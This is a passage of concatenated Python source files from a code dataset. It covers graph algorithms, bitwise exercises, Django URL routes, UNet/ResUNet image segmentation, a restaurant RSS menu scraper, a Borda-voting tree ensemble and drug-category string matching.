\n \n \n \"\"\"\n html = header + tests_result + footer\n\n Path(self.output_directory).mkdir(parents=True, exist_ok=True)\n report = open(self.output_directory + '/flake_report.html', 'w')\n report.write(html)\n report.close()\n","sub_path":"get_tests_results.py","file_name":"get_tests_results.py","file_ext":"py","file_size_in_byte":3715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"636594145","text":"import sys\n\n# No cycle graph, just find the path, shortest path, topo sort\ng = {}\ng[0] = set([1,3])\ng[1] = set([2])\ng[2] = set([5])\ng[3] = set([4])\ng[4] = set([7])\ng[5] = set([6])\ng[6] = set([7])\ng[7] = set()\n# print(g)\ndef printEdge(g):\n\tfor v in g:\n\t\tprint('edges from %s' % (v))\n\t\tfor n in g[v]:\n\t\t\tprint(\"%s -- > %s\" % (v,n)),\n\t\tprint('\\b')\n\ndef isPath(g, v1, v2):\n\tq = [v1]\n\twhile q:\n\t\ttemp = q.pop(0)\n\t\tif temp == v2:\n\t\t\treturn True\n\t\tfor x in g[temp]:\n\t\t\tif x not in q:\n\t\t\t\tq.append(x)\n\treturn False\n\ndef printPath(g, v1, v2):\n\tres = []\n\tdef helper(res, v1, v2, sub):\n\t\tif v1 == v2 :\n\t\t\tres.append(sub + [v1])\n\t\tfor v in g[v1]:\n\t\t\thelper(res, v, v2, sub + [v1])\n\n\thelper(res, v1, v2, [])\n\tprint('All paths from %s to %s' % (v1, v2))\n\tprint(res)\n\treturn res\n\ndef shorestPath(g, v1, v2):\n\tq, res = [[v1]], []\n\tcnt = 1\n\tdef helper(level):\n\t\tres = []\n\t\tfor n in level:\n\t\t\tfor x in g[n]:\n\t\t\t\tif x not in res:\n\t\t\t\t\tres.append(x)\n\t\treturn res\n\twhile q:\n\t\ttemp = q.pop(0)\n\t\tfor n in temp:\n\t\t\tif n == v2:\n\t\t\t\tprint(cnt)\n\t\t\t\treturn cnt\n\t\tlevel = helper(temp)\n\t\tif level:\n\t\t\tq.append(helper(temp))\n\t\t\tcnt += 1\n\tprint('NO Path')\n\n\nprintEdge(g)\nprint(isPath(g, 2,3))\nprintPath(g,0,7)\nshorestPath(g, 2, 3)\n\ng = {}\ng[0] = set([(1,1),(2,2),(4,0)])\ng[1] = set([(4,4)])\ng[2] = set([(3,3)])\ng[3] = set([(4,1)])\ng[4] = set([])\n\nprintEdge(g)\nimport heapq\n# find the shortest path to all vertices from source\ndef Dijkstra(g, v):\n\tdis = {}\n\theapmap = []\n\tparent = {}\n\n\t## in a heapmap, initialize all v with distance infinite\n\tfor v in g:\n\t\theapmap\n\n#bipartie, cycle, trie\n# anyway, maybe work on the bipartie graph first\ng = {}\ng[0] = set([3])\ng[1] = set([3,4])\ng[2] = set([4])\ng[3] = set([0,1])\ng[4] = set([1,2])\n\ndef biparte(g):\n\td = {x: None for x in g}\n\tq = [0]\n\twhile q:\n\t\ttemp = q.pop(0)\n\t\tcolor = d[temp]\n\t\tfor n in g[temp]:\n\t\t\tif d[n] == None:\n\t\t\t\tq.append(n)\n\t\t\t\td[n] = not color\n\t\t\tif d[n] == color:\n\t\t\t\treturn False\n\tprint(d)\n\treturn True\n\n#if edges are numbered \ndef biparte2(g):\n\td = ['None' for x in g]\n\td[0] = 'W'\n\tq = [0]\n\twhile q:\n\t\ttemp = q.pop(0)\n\t\tcolor = d[temp]\t\n\t\tfor n in g[temp]:\n\t\t\tif d[n] == 'None':\n\t\t\t\tq.append(n)\n\t\t\t\tif d[temp] == 'W':\n\t\t\t\t\td[n] = 'B'\n\t\t\t\tif d[temp] == 'B':\n\t\t\t\t\td[n] = 'W'\n\t\t\tif d[n] == d[temp]:\n\t\t\t\treturn False\n\treturn True\n\nbiparte2(g)\n\n\n#cycle in a graph\ng = {}\ng[1] = set([2,3,4])\ng[2] = set([3])\ng[3] = set([])\ng[4] = set([5])\ng[5] = set([6])\ng[6] = set([])\nprint(g)\n\ndef isCycle(g):\n\twhite = g.keys()\n\tgrey = []\n\tblack = []\n\n\twhile white:\n\t\tcur = white[0]\n\t\tif dfs(cur, white, grey, black):\n\t\t\treturn True\n\treturn False\n\ndef dfs (cur, white, grey, black):\n\tmove_vertex (cur, white, grey)\n\tfor n in g[cur]:\n\t\tif n in black:\n\t\t\tcontinue\n\t\tif n in grey:\n\t\t\treturn True\n\t\tif 
dfs(n,white,grey,black):\n\t\t\treturn True\n\tmove_vertex(cur, grey, black)\n\treturn False\n\ndef move_vertex(v, source, dest):\n\tprint(v,source, dest)\n\tsource.remove(v)\n\tdest.append(v)\n\nprint(isCycle(g))","sub_path":"graph2.py","file_name":"graph2.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"50571294","text":"from django.conf.urls import url\nfrom .views import *\n\nurlpatterns = [\n    url(r'^$', index_views),\n    url(r'^index/$', index_views),\n    url(r'^login/$', login),\n    url(r'^register/$', register),\n]\n\nurlpatterns += [\n    url(r'^temp01/$', temp01),\n    url(r'^temp02/$', temp02),\n    url(r'^temp03/$', temp03_static),\n]\n\n\n\n","sub_path":"django_demo1/index/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"404897765","text":"print(\"yut\")\n\"\"\"\nThis is me messing around with bitwise operators and checking different uses\nfor each sign\n\nPython 3.8\nJP Valentine\n9/13/2020\n\"\"\"\n\na=255 #1111 1111\nb=0 #0000 0000\nc=170 #1010 1010\nd=85 #0101 0101\ne=15 #0000 1111\nf=240 #1111 0000\n\ndef setBlank():\n    \"\"\"\n    resets each variable to their original values\n    \"\"\"\n    a=255 #1111 1111\n    b=0 #0000 0000\n    c=170 #1010 1010\n    d=85 #0101 0101\n    e=15 #0000 1111\n    f=240 #1111 0000\n\ndef bitVal(n):\n    \"\"\"\n    prints int no bigger than 255 and displays the bit value of\n    the int\n    :param n: takes an int to be printed\n    :return: returns a string with the bit value\n    \"\"\"\n    x=128\n    n=abs(n)\n    new=\"\"#new value to be printed\n    for i in range(8):\n        if n>=x:\n            n=n-x\n            new=new+\"1\"\n        else:\n            new=new+\"0\"\n        x=x/2\n    return new\n\ndef parity(n):\n    \"\"\"\n    parity checking function that can do 64 bit numbers prints out 1 or zero at\n    the end\n    :param n: number to be checked\n    \"\"\"\n    n ^= n>>32\n    n ^= n>>16\n    n ^= n>>8\n    n ^= n>>4\n    n ^= n>>2\n    n ^= n>>1\n    print(n&1)\n\ndef bitSwap(n,i,j):\n    \"\"\"\n    swapping bits on a number\n    :param n: number to have bits swapped\n    :param i: first position in which the bit should be swapped\n    :param j: second position in which the bit should be swapped\n    \"\"\"\n    if (n>>i)&1 != (n>>j)&1:#shift right on n until i and j positions then check if that bit is the same\n        bitMask = (1<<i)|(1<<j)\n        n = n^bitMask\n        print(bitVal(n))\n\nb=a>>3\nprint(b)\nprint(bitVal(b))\nb=0\nif (a>>8)==b:\n    print(\"Worked!\")\nq=0\nprint(bitVal(~q))\nprint(\"-------------\")\nparity(254)\nbitSwap(255,8,1)\n","sub_path":"quickProj/bitFun.py","file_name":"bitFun.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"52199673","text":"# coding: utf-8\nfrom base.LinkedList import SinglyNode\nfrom base.LinkedList import SinglyList\n\n\n# Problem:\n# Write code that removes duplicate elements from an unsorted linked list.\n# Follow-up: if a temporary buffer may not be used, how would you solve this problem?\n\n# Approach:\n# Use a hash to check whether a value has already appeared. O(n)\n# The hash requires a buffer, so when it cannot be used,\n# keep two indices and detect duplicates with a full double-loop scan. O(n^2)\n\n# Implementation:\n# Implemented as class methods in base/LinkedList.py.\n# The functions whose comments say \"question 2.1\" are the ones in question.\n\n# A simple functional test follows.\n\nLList = SinglyList()\nLList2 = SinglyList()\n\ntest_values = [1, 1, 2, 3, 4, 5, 5, 4, 6]\n\nfor value in test_values:\n    LList.append(value)\n    LList2.append(value)\n\nLList.delete_duplicate()\nLList2.delete_duplicate_less_mem()\n\nprint(\"check 
value\")\nprint(LList)\nprint(LList2)","sub_path":"CrackingTheCodingInterview_v5/Chapter2_LinkedList/2_1.py","file_name":"2_1.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"595941784","text":"import os\nimport random\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom keras.layers import Conv2D, MaxPooling2D, UpSampling2D, Concatenate\nfrom keras.layers import Input, BatchNormalization, Activation, Add, Layer, Flatten\nfrom keras.models import Model\n\nseed = 2020\nrandom.seed = seed\nnp.random.seed = seed\ntf.seed = seed\n\nclass DataGen(keras.utils.Sequence):\n def __init__(self, ids, path, batch_size=8, image_size=128):\n self.ids = ids\n self.path = path\n self.batch_size = batch_size\n self.image_size = image_size\n self.on_epoch_end()\n \n def __load__(self, id_name):\n image_path = os.path.join(self.path, id_name, \"images\", id_name) + \".png\"\n image = cv2.imread(image_path, 1)\n image = cv2.resize(image, (self.image_size, self.image_size))\n \n image = image/255.0\n return image\n \n def __getitem__(self, index):\n if (index+1)*self.batch_size > len(self.ids):\n self.batch_size = len(self.ids) - index*self.batch_size\n \n file_batch = self.ids[index*self.batch_size : (index+1)*self.batch_size]\n \n image = []\n for id_name in file_batch:\n _img = self.__load__(id_name)\n image.append(_img) \n image = np.array(image)\n \n return image\n def on_epoch_end(self):\n pass\n \n def __len__(self):\n return int(np.ceil(len(self.ids)/float(self.batch_size)))\n \n\ndef down_block(x, filters, kernel_size=(3,3), padding=\"same\", strides=1):\n c = Conv2D(filters, kernel_size, padding=padding, strides=strides, activation=\"relu\")(x)\n c = Conv2D(filters, kernel_size, padding=padding, strides=strides, activation=\"relu\")(c)\n p = MaxPooling2D((2,2), (2,2))(c)\n return c, p\n\ndef up_block(x, skip, filters, kernel_size=(3,3), padding=\"same\", strides=1):\n us = UpSampling2D((2, 2))(x)\n concat = Concatenate()([us, skip])\n c = Conv2D(filters, kernel_size, padding=padding, strides=strides, activation=\"relu\")(concat)\n c = Conv2D(filters, kernel_size, padding=padding, strides=strides, activation=\"relu\")(c) \n return c\n\ndef bottleneck(x, filters, kernel_size=(3,3), padding=\"same\", strides=1):\n c = Conv2D(filters, kernel_size, padding=padding, strides=strides)(x)\n c = Conv2D(filters, kernel_size, padding=padding, strides=strides)(c)\n return c\n\ndef UNet():\n f = [16, 32, 64, 128, 256]\n inputs = Input((IMAGE_SIZE, IMAGE_SIZE, 3))\n \n p0 = inputs\n c1, p1 = down_block(p0, f[0]) # 128->64\n c2, p2 = down_block(p1, f[1]) # 64->32\n c3, p3 = down_block(p2, f[2]) # 32->16\n c4, p4 = down_block(p3, f[3]) # 16->8\n \n bn = bottleneck(p4, f[4])\n \n u1 = up_block(bn, c4, f[3]) # 8->16\n u2 = up_block(u1, c3, f[2]) # 16->32\n u3 = up_block(u2, c2, f[1]) # 32->64\n u4 = up_block(u3, c1, f[0]) # 64->128\n \n outputs = Conv2D(1, (1,1), padding=\"same\", activation=\"sigmoid\")(u4)\n model = Model(inputs, outputs)\n return model\n\ndef bn_act(x, act=True):\n x = BatchNormalization()(x)\n if act == True:\n x = Activation(\"relu\")(x)\n return x\n\ndef conv_block(x, filters, kernel_size=(3,3), padding=\"same\", strides=1):\n conv = bn_act(x)\n conv = Conv2D(filters, kernel_size, padding=padding, strides=strides)(conv)\n return conv\n\ndef stem(x, filters, kernel_size=(3,3), padding=\"same\", strides=1):\n conv = 
Conv2D(filters, kernel_size, padding=padding, strides=strides)(x)\n conv = conv_block(conv, filters, kernel_size=kernel_size, padding=padding, strides=strides)\n \n shortcut = Conv2D(filters, kernel_size=(1,1), padding=padding, strides=strides)(x)\n shortcut = bn_act(shortcut, act=False)\n \n output = Add()([conv, shortcut])\n return output\n\ndef residual_block(x, filters, kernel_size=(3,3), padding=\"same\", strides=1):\n res = conv_block(x, filters, kernel_size=kernel_size, padding=padding, strides=strides)\n res = conv_block(res, filters, kernel_size=kernel_size, padding=padding, strides=1) \n \n shortcut = Conv2D(filters, kernel_size=(1,1), padding=padding, strides=strides)(x)\n shortcut = bn_act(shortcut, act=False)\n \n output = Add()([res, shortcut])\n return output\n\ndef upsample_concat_block(x, xskip):\n u = UpSampling2D((2, 2))(x)\n concat = Concatenate()([u ,xskip])\n return concat\n\n#### ResUnet ###\ndef ResUNet():\n f = [16, 32, 64, 128, 256]\n inputs = Input((IMAGE_SIZE, IMAGE_SIZE, 3))\n \n # ENCODER\n e0 = inputs\n e1 = stem(e0, f[0])\n e2 = residual_block(e1, f[1], strides=2)\n e3 = residual_block(e2, f[2], strides=2)\n e4 = residual_block(e3, f[3], strides=2)\n e5 = residual_block(e4, f[4], strides=2)\n \n # BRIDGE\n b0 = conv_block(e5, f[4], strides=1)\n b1 = conv_block(b0, f[4], strides=1)\n \n # DECODER\n u1 = upsample_concat_block(b1, e4)\n d1 = residual_block(u1, f[4]) \n \n u2 = upsample_concat_block(d1, e3)\n d2 = residual_block(u2, f[3])\n \n u3 = upsample_concat_block(d2, e2)\n d3 = residual_block(u3, f[2])\n \n u4 = upsample_concat_block(d3, e1)\n d4 = residual_block(u4, f[1])\n \n outputs = Conv2D(1, (1,1), padding=\"same\", activation=\"sigmoid\")(d4)\n model = Model(inputs, outputs)\n return model\n\n\nIMAGE_SIZE = 128\nTEST_PATH = \"dataset/test/\"\nBATCH_SIZE = 65\n\ntest_ids = next(os.walk(TEST_PATH))[1]\n\ngen = DataGen(test_ids, TEST_PATH, batch_size=BATCH_SIZE, image_size=IMAGE_SIZE)\nx= gen.__getitem__(0)\nprint(x.shape)\n\nmodel1 = UNet()\nmodel2 = ResUNet()\n\nmodel2.load_weights('ResUNet.h5')\nmodel1.load_weights('UNetW.h5')\n\nresult1 = model1.predict(x)\nresult1 = result1 > 0.5\n\nresult2 = model2.predict(x)\nresult2 = result2 > 0.5\n\n\nfig = plt.figure()\nfig.subplots_adjust(hspace=0.4, wspace=0.4)\nax = fig.add_subplot(1,2,1)\nax.imshow(x[17])\nplt.title(\"Original Image\")\n# ax = fig.add_subplot(1,3,2)\n# ax.imshow(np.reshape(result1[17]*255, (IMAGE_SIZE, IMAGE_SIZE)), cmap=\"gray\")\n# plt.title(\"UNet Mask\")\nax = fig.add_subplot(1,2,2)\nax.imshow(np.reshape(result2[17]*255, (IMAGE_SIZE, IMAGE_SIZE)), cmap=\"gray\")\nplt.title(\"ResUNet Mask\")\nplt.show()\n\n\n\n\n\n\n\n\n","sub_path":"backend/ml_files/throat-tumor/throat_predict.py","file_name":"throat_predict.py","file_ext":"py","file_size_in_byte":6170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"75783785","text":"import xml.etree.ElementTree as ET\nimport urllib2\n\nURL = 'https://www.fazerfoodco.fi/modules/MenuRss/MenuRss/CurrentWeek?costNumber=0436&language=fi'\n\nxml = urllib2.urlopen(URL)\n\ntree = ET.parse(xml)\nroot = tree.getroot()\n\nstring = ''\nfor child in root:\n for child2 in child:\n if child2.tag == 'title':\n string += '
' + str(child2.text.encode(\"utf-8\")) + ''\n        if child2.tag == 'item':\n            for child3 in child2:\n                if child3.tag == 'title':\n                    string += '' + str(child3.text.encode(\"utf-8\")) + '
'\n if child3.tag == 'description':\n try:\n string += str(child3.text.encode(\"utf-8\"))\n except AttributeError:\n string += ''\n\nfile = open(\"../views/canthia.html\", \"w\")\nhead = open(\"../head/head.html\", \"r\")\nheadread = head.read()\nfile.write(headread + \"\\n\" + string + \"\\n\" + \"\")\nfile.close()\nhead.close()\n\nprint(\"canthia doned\")\n","sub_path":"scripts/canthia.py","file_name":"canthia.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"492626290","text":"# Borda Voting. CoverType Data.\n#-------------------------------------------------------------------------------------\n# Class Label (1-7) Last attribute. \n#-------------------------------------------------------------------------------------\nimport timeit\nstart = timeit.default_timer()\n\nfrom sklearn.preprocessing import Normalizer\nfrom sklearn.decomposition import PCA\nfrom sklearn.ensemble import BaggingClassifier\nfrom sklearn import model_selection\nfrom sklearn.tree import DecisionTreeClassifier\nimport sklearn\nimport numpy as np\nimport scipy.stats as ss\n\n\n\n#Open/load training data for CoverType. Training & testing are both same. \n#Will need to split into training/test sets (CrossValidation/Holdout)\ntrain_file = open('covtype.data', 'r').read().split(\"\\n\")\ntrain_file.pop() #remove last element in list, the extra ' '\n\n\n# Organize the training data. Convert the 1D list of strings (individual records) into a \n# 2D list of integer attributes, where each row is a single record. Final format of \n# training data will look like: [[1, 2,...55 attributes], [record2],...[record581,012]] \ntrainset = []\nfor single_record in train_file:\n\tsingle_record = single_record.split(',')\n\t# Turn the list of string attributes into integers.\n\tsingle_recordInt = list(map(int, single_record)) \n\ttrainset.append(single_recordInt)\n\n\n# Extract training class labels for each record/row and add it to a separate list. \n# It will always be the last attribute, so pop the last value in each sublist. This is a \n# 1D list of class labels. \ntrainset_labelsY = []\nfor single_record in trainset:\n\tlabel = single_record.pop()\n\ttrainset_labelsY.append(label)\n\n\t\n\t\n# print(trainset)\n# print(trainset_labelsY)\n# print(len(trainset))\n# print(len(trainset_labelsY))\n\n\n# Set aside some of the training set, \"trainset\" for Cross Validation/Holdout. We will call\n# this the \"testset\". We will have approximately a 70-30 split. Where 70% of data is \n# training and 30% is the test set.\noriginal_trainsetlen = len(trainset)\noriginal_trainsetlnY = len(trainset_labelsY)\nN = int(len(trainset)*.70)\n\ntestset = trainset[N:]\ntrainset = trainset[:N]\n\ntestset_labelsY = trainset_labelsY[N:]\ntrainset_labelsY = trainset_labelsY[:N]\n\n#------------------------------------------\n# Normalize the training data: \nscaler = Normalizer().fit(trainset)\ntrainset = scaler.transform(trainset)\n\n\n# Normalize the test data: Don't need if using KFold Validation.\nscaler_test = Normalizer().fit(testset)\ntestset = scaler_test.transform(testset)\n\n\n# Instantiate the PCA tool to transform the data using Principal Component Analysis.\npca = PCA()\n\n# Transform the training data so you have a PCA-transformed data set.\ntrainset = pca.fit_transform(trainset)\n\n# transform test data using the previously fitted PCA object. 
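# An illustrative aside (the arrays X_train/X_test below are hypothetical, not
# from this script): fitting PCA on the training split and reusing that same
# fitted object on the test split keeps both splits in one coordinate system
# and avoids leaking test data into the fit, e.g.:
#   pca_demo = PCA(n_components=10)
#   X_train_t = pca_demo.fit_transform(X_train)  # components learned on train only
#   X_test_t = pca_demo.transform(X_test)        # same components reused on test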
\ntestset = pca.transform(testset)\n\n\nprint(\"GOT HERE!\")\n# ------------------ BORDA VOTING IMPLEMENTATION ---------------------------\n# Borda Counting Method Function\ndef myborda(probs):\n    probrank=[]\n    \n    for i in range(probs.shape[0]):\n        probrank.append(ss.rankdata(probs[i,:],method='average')-1)\n    \n    probrank=np.array(probrank)\n    #print(probrank)\n    \n    ranksums=np.sum(probrank,0)\n    #print(ranksums)\n    \n    #return the column index of the class with the max number of points\n    return np.argmax(ranksums)\n\n\nlist_ensemble_accuracy = []\nfor i in range(10):\n\t#Bagging Samples, each row of mega_index is a sample\n\t# each column of a row being the index of trainset to be included in the sample\n\tnum_trees = 20\n\n\tmega_index=np.random.randint(len(trainset),size=(num_trees,int(len(trainset)*(2/3))))\n\n\t# print(mega_index)\n# \tprint(len(mega_index[0]))\n# \tprint(len(mega_index))\n\n# grab the training data at that specific index for each subsample. Bagging Model.\n\tsub_samples_x = []\n\tsub_samples_y = []\n\tfor row in mega_index:\n\t\tlist_samples = []\n\t\tlist_samples_y = []\n\t\tfor col in row:\n\t\t\trecord = trainset[col]\n\t\t\trecord_y = trainset_labelsY[col]\n\t\t\tlist_samples.append(record)\n\t\t\tlist_samples_y.append(record_y)\n\t\tsub_samples_x.append(list_samples)\n\t\tsub_samples_y.append(list_samples_y)\n\t\n\n\n\t# Create the twenty decision trees for the ensemble. Each bag is fit on a\n\t# fresh clone of the template tree; calling master_DT.fit() directly for\n\t# every bag would make fit0..fit19 all alias the same last-fitted estimator.\n\tmaster_DT = DecisionTreeClassifier(max_depth = 7, random_state = 42)\n\n\tfit0 = sklearn.clone(master_DT).fit(sub_samples_x[0], sub_samples_y[0])\n\tfit1 = sklearn.clone(master_DT).fit(sub_samples_x[1], sub_samples_y[1])\n\tfit2 = sklearn.clone(master_DT).fit(sub_samples_x[2], sub_samples_y[2])\n\tfit3 = sklearn.clone(master_DT).fit(sub_samples_x[3], sub_samples_y[3])\n\tfit4 = sklearn.clone(master_DT).fit(sub_samples_x[4], sub_samples_y[4])\n\tfit5 = sklearn.clone(master_DT).fit(sub_samples_x[5], sub_samples_y[5])\n\tfit6 = sklearn.clone(master_DT).fit(sub_samples_x[6], sub_samples_y[6])\n\tfit7 = sklearn.clone(master_DT).fit(sub_samples_x[7], sub_samples_y[7])\n\tfit8 = sklearn.clone(master_DT).fit(sub_samples_x[8], sub_samples_y[8])\n\tfit9 = sklearn.clone(master_DT).fit(sub_samples_x[9], sub_samples_y[9])\n\tfit10 = sklearn.clone(master_DT).fit(sub_samples_x[10], sub_samples_y[10])\n\tfit11 = sklearn.clone(master_DT).fit(sub_samples_x[11], sub_samples_y[11])\n\tfit12 = sklearn.clone(master_DT).fit(sub_samples_x[12], sub_samples_y[12])\n\tfit13 = sklearn.clone(master_DT).fit(sub_samples_x[13], sub_samples_y[13])\n\tfit14 = sklearn.clone(master_DT).fit(sub_samples_x[14], sub_samples_y[14])\n\tfit15 = sklearn.clone(master_DT).fit(sub_samples_x[15], sub_samples_y[15])\n\tfit16 = sklearn.clone(master_DT).fit(sub_samples_x[16], sub_samples_y[16])\n\tfit17 = sklearn.clone(master_DT).fit(sub_samples_x[17], sub_samples_y[17])\n\tfit18 = sklearn.clone(master_DT).fit(sub_samples_x[18], sub_samples_y[18])\n\tfit19 = sklearn.clone(master_DT).fit(sub_samples_x[19], sub_samples_y[19])\n\n\n\n\t# Posterior probabilities of each of the bagged decision trees. 
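# A toy trace of myborda above (illustrative numbers, not dataset values):
# for probs = np.array([[0.2, 0.5, 0.3], [0.1, 0.3, 0.6]]) the zero-based
# per-row ranks are [0, 2, 1] and [0, 1, 2], the column rank sums are
# [0, 3, 3], and np.argmax picks index 1 -- the first column with the top sum.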
\n\tprobs0 = fit0.predict_proba(testset)\n\tprobs1 = fit1.predict_proba(testset)\n\tprobs2 = fit2.predict_proba(testset)\n\tprobs3 = fit3.predict_proba(testset)\n\tprobs4 = fit4.predict_proba(testset)\n\tprobs5 = fit5.predict_proba(testset)\n\tprobs6 = fit6.predict_proba(testset)\n\tprobs7 = fit7.predict_proba(testset)\n\tprobs8 = fit8.predict_proba(testset)\n\tprobs9 = fit9.predict_proba(testset)\n\tprobs10 = fit10.predict_proba(testset)\n\tprobs11 = fit11.predict_proba(testset)\n\tprobs12 = fit12.predict_proba(testset)\n\tprobs13 = fit13.predict_proba(testset)\n\tprobs14 = fit14.predict_proba(testset)\n\tprobs15 = fit15.predict_proba(testset)\n\tprobs16 = fit16.predict_proba(testset)\n\tprobs17 = fit17.predict_proba(testset)\n\tprobs18 = fit18.predict_proba(testset)\n\tprobs19 = fit19.predict_proba(testset)\n\n\n\tpredictions = []\n\tindex_probs = 0\n\tfor record in testset:\n\t\tnew_probs_list = []\n\t\tnew_probs_list.append(probs0[index_probs])\n\t\tnew_probs_list.append(probs1[index_probs])\n\t\tnew_probs_list.append(probs2[index_probs])\n\t\tnew_probs_list.append(probs3[index_probs])\n\t\tnew_probs_list.append(probs4[index_probs])\n\t\tnew_probs_list.append(probs5[index_probs])\n\t\tnew_probs_list.append(probs6[index_probs])\n\t\tnew_probs_list.append(probs7[index_probs])\n\t\tnew_probs_list.append(probs8[index_probs])\n\t\tnew_probs_list.append(probs9[index_probs])\n\t\tnew_probs_list.append(probs10[index_probs])\n\t\tnew_probs_list.append(probs11[index_probs])\n\t\tnew_probs_list.append(probs12[index_probs])\n\t\tnew_probs_list.append(probs13[index_probs])\n\t\tnew_probs_list.append(probs14[index_probs])\n\t\tnew_probs_list.append(probs15[index_probs])\n\t\tnew_probs_list.append(probs16[index_probs])\n\t\tnew_probs_list.append(probs17[index_probs])\n\t\tnew_probs_list.append(probs18[index_probs])\n\t\tnew_probs_list.append(probs19[index_probs])\n\t\n\t\tnew_probs_list=np.array(new_probs_list)\n\t\tborda_predict = myborda(new_probs_list)\n\t\tpredictions.append(fit0.classes_[borda_predict])\n\t\tindex_probs += 1\n\n\n\taccuracy = sklearn.metrics.accuracy_score(testset_labelsY, predictions)\n\tlist_ensemble_accuracy.append(accuracy)\n\tprint(\"ADDED ACCURACY: \", i)\n\t\n\n\nlist_ensemble_accuracy = np.array(list_ensemble_accuracy)\n\n\n\n\nprint(\"Borda Voting. Cover Type. Normalized/PCA. 
Max_depth 7: \")\nprint(list_ensemble_accuracy)\nprint(\"MIN: \", list_ensemble_accuracy.min())\nprint(\"MAX: \", list_ensemble_accuracy.max())\nprint(\"MEAN: \", list_ensemble_accuracy.mean())\n\n\n# print(sub_samples_x)\n# print(sub_samples_x[0])\n# print(sub_samples_y)\n# print(sub_samples_y[0])\n# print(predictions)\n# print(len(predictions))\n\t\t\n\n\n\n# Calculates average runtime of the code.\nstop = timeit.default_timer()\n\nprint('Time: ', stop - start) \n\n\n\n\n","sub_path":"Borda Voting (CoverType).py","file_name":"Borda Voting (CoverType).py","file_ext":"py","file_size_in_byte":8108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"433943388","text":"from DrugWeb import *\nimport nltk\nfrom nltk.book import FreqDist\nimport math\nfrom collections import Counter\nfrom operator import itemgetter\n\ncondtions = [\"depression\",\"chickenpox\",\"flu\",\"rheumatoid arthritis\",\"crohn's disease\",\"alzheimer's\",\"heart disease\",\"erectile dysfunction\",\"high blood pressure\",\"hypothyroidism\",\"cholesterol\"]\nweb = DrugWeb(\"DrugWeb\")\n\nallCategories=web.get_all_cats()\nallCategories = [item[1:len(item)-1] for item in allCategories]\n\ndef readDrugCategoryFile(website):\n dir = 'drugCategoriesExtracted/drugCategoriesExtracted'\n fileName = \"\"\n if website == 'NHS':\n fileName = dir + \"NHS.txt\"\n elif website == 'HEALTHLINE':\n fileName = dir + 'HEATHLINE.txt'\n elif website == 'MAYO':\n fileName = dir + 'MAYO.txt'\n elif website =='WEBMD':\n fileName = dir + 'WEBMD.txt'\n\n conditionAndCategories = {}\n with open(fileName)as f:\n lines = [line.strip('\\n') for line in f]\n for line in lines:\n drugcategories = []\n line = line.split('\\t')\n condition = line[0]\n for i in range(1, len(line)):\n phrase = line[i]\n if phrase:\n drugcategories = drugcategories + [phrase]\n conditionAndCategories[condition] = drugcategories\n return conditionAndCategories\n\ndef normalizeData(drugCategories):\n for key in drugCategories:\n for x in range(0,len(drugCategories[key])):\n if drugCategories[key][x].endswith('y'):\n drugCategories[key][x]=drugCategories[key][x][0:len(drugCategories[key][x])-1]\n drugCategories[key][x] = drugCategories[key][x] + \"ies\"\n #print(drugCategories[key][x])\n elif not drugCategories[key][x].endswith('s'):\n drugCategories[key][x] = drugCategories[key][x] + \"s\"\n #print(drugCategories[key][x])\n return drugCategories\n\ndef lcs(S,T):\n m = len(S)\n n = len(T)\n counter = [[0]*(n+1) for x in range(m+1)]\n longest = 0\n lcs_set = set()\n for i in range(m):\n for j in range(n):\n if S[i] == T[j]:\n c = counter[i][j] + 1\n counter[i+1][j+1] = c\n if c > longest:\n lcs_set = set()\n longest = c\n lcs_set.add(S[i-c+1:i+1])\n elif c == longest:\n lcs_set.add(S[i-c+1:i+1])\n\n return lcs_set\n\ndef minimumEditDistance(s1,s2):\n if len(s1) > len(s2):\n s1,s2 = s2,s1\n distances = range(len(s1) + 1)\n for index2,char2 in enumerate(s2):\n newDistances = [index2+1]\n for index1,char1 in enumerate(s1):\n if char1 == char2:\n newDistances.append(distances[index1])\n else:\n newDistances.append(1 + min((distances[index1],\n distances[index1+1],\n newDistances[-1])))\n distances = newDistances\n return distances[-1]\n\n\ndef getDrugCategories(categoryList):\n temp = [nltk.word_tokenize(sent) for sent in allCategories]\n temp = [nltk.pos_tag(item, tagset= 'universal') for item in temp]\n grammar = r\"\"\"\n X:\n {<.*>+} # Chunk everything\n }+{ # Chink sequences of VBD and IN\n \"\"\"\n cp = 
nltk.RegexpParser(grammar)\n #print(allCategories)\n #print(temp)\n\n trees = {}\n i=0\n for sent in temp:\n trees[allCategories[i]]=cp.parse(sent)\n i=i+1\n\n #print(trees)\n allCategoriesChinked={}\n for key in trees:\n chunks = []\n for tree in trees[key].subtrees():\n if tree.label() == 'X':\n chunks.append(nltk.untag(tree.leaves()))\n allCategoriesChinked[key]=chunks\n #print(allCategoriesChinked)\n\n allCategoriesReDefined = {}\n for key in allCategoriesChinked:\n chunks = []\n for item in allCategoriesChinked[key]:\n chunks.append(\" \".join(item))\n allCategoriesReDefined[key] = chunks\n\n #print(allCategoriesReDefined)\n\n #print(categoryList)\n\n finalCategories = []\n for extractedCategory in categoryList:\n for key in allCategoriesReDefined:\n for generalCategory in allCategoriesReDefined[key]:\n dist = minimumEditDistance(generalCategory,extractedCategory)\n if dist/min(len(generalCategory),len(extractedCategory))<0.47:\n finalCategories.append(key)\n #print(key,\": \",extractedCategory)\n #str = lcs(generalCategory,extractedCategory)\n #if len(str)/min(len(generalCategory),len(extractedCategory)) >= 0.8:\n #print(key,\": \",extractedCategory)\n return finalCategories\n\n\n\ndef filterDrugsCategoriesNHS(condition):\n drugCategories = readDrugCategoryFile('NHS')\n 